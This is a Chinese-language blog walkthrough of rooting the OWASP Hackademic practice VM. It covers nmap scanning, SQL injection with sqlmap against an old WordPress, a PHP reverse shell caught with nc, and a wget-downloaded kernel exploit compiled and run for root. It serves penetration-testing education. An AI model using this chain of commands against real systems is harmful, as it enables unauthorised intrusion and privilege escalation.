root this box


发布人:admin分类:网络安全浏览量:20发布时间:2017-12-12

一直在发系统安全的文章,换换口味,今天发个渗透测试方面的科普文章,它是owasp的项目我们的挑战的目标是拿到root。

准备阶段:

首先,下载vmware漏洞镜像并且配置好桥接模式,我们把目标准备好了,但并不知道目标的ip地址,可以使用nmap来扫描发现存活的主机,通过nmap命令nmap -sn 192.168.0.*。

我们可以发现存活的主机192.168.0.102状态是up状态,该主机即为目标,通过执行命令对192.168.0.102进行扫描,nmap -sS -sV 192.168.0.102

可以发现该主机开放了80端口,22端口是关闭的,通过访问192.168.0.102的80端口,我们发现该端口上运行了个web应用程序Hackademic

通过点击root this box,我们跳转到了另外一个页面。

该页面告诉我们,需要获取到Hackademic的root权限,并且在/root目标下读取key.txt,ok,let's go start game.

通过查看网页源代码,我们发现这个web应用是运行在WordPress version 1.5.1.1上的。

该版本是比较老的,由此我们可以得知它一定存在漏洞,通过google搜索WordPress version 1.5.1.1,我们发现该版本存在一处sql注入漏洞。

从exp提供的get参数上来看,漏洞存在于cat参数,于是我们对该漏洞进行利用,输入’号后,得到了sql语句执行错误,从sql错误上,可以判断出该系统使用的是mysql。

通过使用sqlmap进行自动化工具注入,很快获取到了mysql的库名。

得到库名后,又通过注入得到了表名。

然后得到了wodpress库的字段名称。

通过继续注入,获取到了wp的帐号密码。

通过破解帐号密码,获取到了wp的账户信息。

经过扫描该存在漏洞的站点,我们获取到了该系统的后台地址;

通过尝试上述的用户名密码,得知George Miller的账户是管理员账户,ok,成功登录。

通过在上传处修改可上传的文件扩展名,php

通过在上传页面上传,上传php反弹脚本,获取到了文件名。

通过访问我们上传的php页面,并且在本地使用nc监听4444端口,成功获取shell。

这里,需要访问/root目录,但经过测试,发现访问/root目标是被禁止的,因为没有权限嘛

通过之前信息收集,得知内核版本为2.6.31.5-127,而系统为fedora,结合这些信息进行google搜索,得到exp下载地址,下载

wget downloads.securityfocus.com/vulnerabilities/exploits/44219.c,下边也就是大家都知道,伪黑客黑linux3部曲,1、

wget;2、gcc 44129 –o exploit;3、./exploit;

成功获取到了目标root权限:

通过cd /root,然后运行ls得到目录名称为:

查看key.txt,我们获取到了目标文件。

总结

just enjoy,thx...

被黑站点统计 - 文章版权1、本主题所有言论和图片纯属会员个人意见,与本文章立场无关
2、本站所有主题由该文章作者发表,该文章作者与被黑站点统计享有文章相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该文章作者和被黑站点统计的同意
4、文章作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
7、被黑站点统计管理员有权不事先通知发贴者而删除本文

免责声明

本站主要通过网络搜集国内被黑网站信息,统计分析数据,为部署安全型网络提供强有力的依据.本站所有工作人员均不参与黑站,挂马或赢利性行为,所有数据均为网民提供,提交者不一定是黑站人,所有提交采取不记名,先提交先审核的方式,如有任何疑问请及时与我们联系.

admin  的文章


微信公众号

微信公众号


Copyright © 2012-2022被黑网站统计系统All Rights Reserved
页面总访问量:21230780(PV) 页面执行时间:106.573(MS)
  • xml
  • 网站地图